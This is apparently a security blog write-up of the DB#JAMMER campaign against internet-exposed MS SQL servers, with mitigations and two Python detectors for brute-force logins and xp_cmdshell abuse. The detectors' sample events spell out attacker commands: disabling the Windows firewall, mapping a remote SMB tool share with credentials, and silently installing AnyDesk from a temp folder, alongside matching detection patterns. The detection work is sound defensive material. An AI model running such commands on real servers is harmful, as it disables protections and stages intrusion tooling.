
Overview

A campaign tracked as “DB#JAMMER” has recently drawn the attention of security researchers. The attackers behind it target poorly secured, internet-exposed Microsoft SQL (MS SQL) servers and use them as the entry point for intrusions that deliver both Cobalt Strike and FreeWorld ransomware. Securonix, which first identified the campaign, highlights its distinctive tooling, infrastructure and payloads, and the speed with which the intrusion is carried out once access is gained. Securonix assesses the threat level as medium to high, because there are indications that the attackers are targeting more than MS SQL servers.

Attack Techniques

The attackers’ toolset includes enumeration tools, credential-theft utilities, a remote access trojan (RAT) and the ransomware payload itself. Initial access is gained by brute-forcing logins on the exposed MS SQL servers. Once authenticated, the attackers enumerate the databases and abuse the xp_cmdshell configuration option, which lets Windows shell commands be executed from within SQL Server, to gather reconnaissance about the host and run arbitrary commands. They then disable the Windows firewall and mount a remote SMB share to transfer their tooling onto the server, installing malicious components such as Cobalt Strike to establish persistence. This groundwork is followed by the deployment of the AnyDesk remote-access software, which is in turn used to install the FreeWorld ransomware. Lateral movement is also part of the playbook, as the attackers attempt to spread their malware across the target network. Notably, their attempts to establish Remote Desktop Protocol (RDP) persistence through an Ngrok tunnel were unsuccessful.
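The brute-force stage described above leaves a trail in the SQL Server ERRORLOG: by default the engine records every failed login as error 18456, including the client address. The following is an added example written for this page, not code from Securonix or the original article. It runs a sliding-window failure threshold over constructed ERRORLOG lines and also picks out the informational message the engine writes the first time xp_cmdshell is executed after a service start. The threshold, window, login names and addresses are this example's own assumptions.

```python
"""Flag brute-force logins (and first use of xp_cmdshell) in SQL Server ERRORLOG text.

Added example for this write-up; not code from Securonix or the original article.
SAMPLE_ERRORLOG is constructed to follow the default ERRORLOG layout (error 18456
failed logins carrying a [CLIENT: ip] suffix); threshold, window and addresses
are illustrative choices.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# "<yyyy-mm-dd hh:mm:ss.ff> Logon   Login failed for user '<name>'. Reason: ... [CLIENT: <ip>]"
FAILED_LOGIN = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<ip>[^\]\s]+)\]"
)
# Message written once per service start, the first time xp_cmdshell is invoked.
XP_CMDSHELL_LOADED = re.compile(r"to execute extended stored procedure 'xp_cmdshell'")

# Constructed sample: one source hammering 'sa' (and guessing a login name), one
# legitimate mistyped password from the LAN, then xp_cmdshell being loaded.
SAMPLE_ERRORLOG = """\
2023-08-21 10:00:01.23 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-08-21 10:00:01.47 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-08-21 10:00:01.71 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-08-21 10:00:02.02 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.5]
2023-08-21 10:00:02.30 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-08-21 10:03:15.00 Logon       Login failed for user 'report_ro'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.4.17]
2023-08-21 10:05:00.00 spid52      Using 'xplog70.dll' version '2019.150.2000' to execute extended stored procedure 'xp_cmdshell'. This is an informational message only; no user action is required.
2023-08-21 11:30:00.00 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
"""


def parse_failed_logins(text):
    """Yield (timestamp, login_name, client_ip) for each failed-login line."""
    for line in text.splitlines():
        m = FAILED_LOGIN.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), m["user"], m["ip"]


def detect_bruteforce(text, threshold=5, window=timedelta(minutes=1)):
    """Return {client_ip: {"first_alert": ts, "users_tried": [...]}} for every
    source that accumulates `threshold` failures inside a sliding `window`."""
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    users = defaultdict(set)      # ip -> login names attempted
    alerts = {}
    for ts, user, ip in parse_failed_logins(text):
        users[ip].add(user)
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:  # expire failures older than the window
            q.popleft()
        if len(q) >= threshold and ip not in alerts:
            alerts[ip] = {"first_alert": ts, "users_tried": sorted(users[ip])}
    return alerts


def xp_cmdshell_first_use(text):
    """Timestamps (to the second) at which the xp_cmdshell load message appears."""
    return [line[:19] for line in text.splitlines() if XP_CMDSHELL_LOADED.search(line)]


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_ERRORLOG).items():
        print(f"brute force from {ip} at {info['first_alert']}: tried {info['users_tried']}")
    for ts in xp_cmdshell_first_use(SAMPLE_ERRORLOG):
        print(f"xp_cmdshell loaded at {ts}")
```

Two caveats when running this against a real ERRORLOG: the default login-auditing setting records failed logins only, so a successful guess after the burst will not appear in this log and has to be correlated from elsewhere (for example the Sysmon process events discussed under mitigations), and the xp_cmdshell load message is written only once per service start, so its absence does not mean the procedure has not been used since.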

Mitigations

To safeguard against the “DB#JAMMER” campaign and similar threats, consider the following recommendations, including those from the Securonix research team:

  1. Reduce Attack Surface: Minimise the exposure of MSSQL services to the internet to limit attack opportunities.
  2. Implement Appropriate Defences: In MSSQL environments, restrict the use of xp_cmdshell (it is disabled by default and should stay disabled unless there is a documented need), and monitor common malware staging directories such as “C:\Windows\Temp”. Additionally, deploy process-level logging, including Sysmon and PowerShell logging, so that shell commands spawned by the SQL Server process are recorded.
  3. Strengthen Passwords: Use strong, unique passwords for every login on internet-reachable MSSQL instances, since the campaign’s initial access relies on brute-forcing them.
  4. Leverage Trusted Access Paths: Instead of exposing the database service directly to the internet, place it behind a secure access method such as a Virtual Private Network (VPN).
  5. Regularly Patch and Update: Keep operating systems and software up to date to mitigate vulnerabilities.
  6. Maintain Backups: Maintain offline backups of critical data to ensure a reliable recovery option in case of a security breach.
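Recommendation 2 asks for Sysmon process logging and monitoring of staging directories such as C:\Windows\Temp. The following added example, which is not code from Securonix or the original article, shows the detection logic those logs make possible: it groups Sysmon process-creation (Event ID 1) and file-creation (Event ID 11) events under the cmd.exe processes that sqlservr.exe spawned, which is how xp_cmdshell executes commands, and tags the firewall change, SMB share mapping, staging-directory write and remote-access-tool install that make up the attack chain. The event values, GUID placeholders, indicator patterns and staging paths are constructed for the example.

```python
"""Reconstruct the xp_cmdshell abuse chain from Sysmon events.

Added example for this write-up; not code from Securonix or the original article.
EVENTS is constructed (Sysmon Event ID 1 and Event ID 11 fields flattened to dicts);
the indicator regexes, staging directories and GUID placeholders are illustrative.
"""
import re
from collections import defaultdict

SQLSERVER_IMAGE = "sqlservr.exe"
STAGING_DIRS = ("c:\\windows\\temp\\", "c:\\users\\public\\")
# Command-line indicators for the post-access steps described in the write-up.
RULES = [
    ("firewall_disabled", re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I)),
    ("smb_share_mapped", re.compile(r"\bnet(?:\.exe)?\s+use\s+\\\\\S+", re.I)),
    ("remote_access_tool", re.compile(r"\b(?:anydesk|ngrok)\b", re.I)),
]

SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
CMD = r"C:\Windows\System32\cmd.exe"


def proc(guid, parent_guid, image, parent_image, cmdline):
    """Build a minimal Sysmon Event ID 1 (process creation) record."""
    return {"EventID": 1, "ProcessGuid": guid, "ParentProcessGuid": parent_guid,
            "Image": image, "ParentImage": parent_image, "CommandLine": cmdline}


# Constructed events. Every xp_cmdshell call makes the engine spawn a fresh cmd.exe,
# so the chain shows up as several sibling shells under sqlservr.exe.
EVENTS = [
    proc("{P1}", "{SQL}", CMD, SQLSERVR, r'"cmd.exe" /c whoami /all'),
    proc("{P2}", "{SQL}", CMD, SQLSERVR, r'"cmd.exe" /c netsh advfirewall set allprofiles state off'),
    proc("{P3}", "{P2}", r"C:\Windows\System32\netsh.exe", CMD, r"netsh advfirewall set allprofiles state off"),
    proc("{P4}", "{SQL}", CMD, SQLSERVR, r'"cmd.exe" /c net use \\198.51.100.20\tools /user:guest Passw0rd'),
    {"EventID": 11, "ProcessGuid": "{P4}", "Image": CMD, "TargetFilename": r"C:\Windows\Temp\AnyDesk.exe"},
    proc("{P5}", "{P4}", r"C:\Windows\Temp\AnyDesk.exe", CMD,
         r"C:\Windows\Temp\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent"),
    # Benign noise: a shell under svchost.exe must not be attributed to SQL Server.
    proc("{P6}", "{SVC}", CMD, r"C:\Windows\System32\svchost.exe", r'"cmd.exe" /c dir C:\Windows\Temp'),
]


def detect_xp_cmdshell_chain(events):
    """Group events under the processes sqlservr.exe spawned and collect indicators.

    Returns {"shells_spawned": n, "indicators": [...], "per_root": {guid: [...]}}.
    """
    procs = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    children = defaultdict(list)
    for e in procs.values():
        children[e["ParentProcessGuid"]].append(e["ProcessGuid"])
    # Roots: processes whose parent is the database engine itself (xp_cmdshell children).
    roots = [g for g, e in procs.items() if e["ParentImage"].lower().endswith(SQLSERVER_IMAGE)]

    def descendants(guid):
        seen, stack = set(), [guid]
        while stack:
            g = stack.pop()
            if g not in seen:
                seen.add(g)
                stack.extend(children[g])
        return seen

    per_root = {}
    for root in roots:
        tree = descendants(root)
        tags = set()
        for e in events:
            if e["ProcessGuid"] not in tree:
                continue
            if e["EventID"] == 1:
                tags.update(tag for tag, rx in RULES if rx.search(e["CommandLine"]))
            elif e["EventID"] == 11 and e["TargetFilename"].lower().startswith(STAGING_DIRS):
                tags.add("staging_dir_write")
        per_root[root] = sorted(tags)
    union = sorted(set().union(*per_root.values())) if per_root else []
    return {"shells_spawned": len(roots), "indicators": union, "per_root": per_root}


if __name__ == "__main__":
    result = detect_xp_cmdshell_chain(EVENTS)
    print(f"sqlservr.exe spawned {result['shells_spawned']} shells; indicators: {result['indicators']}")
```

Any process whose parent is sqlservr.exe is worth alerting on its own: SQL Agent jobs run under a separate SQLAGENT.EXE process, so the only routine producer of such children is legitimate xp_cmdshell use, which should be rare enough to allowlist per host once the procedure is restricted as recommended above.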

Conclusion

The success of the “DB#JAMMER” campaign underscores the importance of robust password management, especially for publicly exposed services. Strong, unique passwords are the fundamental defence against the brute-force attacks on MS SQL servers that give these intruders their foothold, and keeping xp_cmdshell restricted limits what an attacker can do if a password does fall. By following the recommendations provided by Securonix and adhering to general security best practice, organisations can strengthen their defences against this campaign and others like it.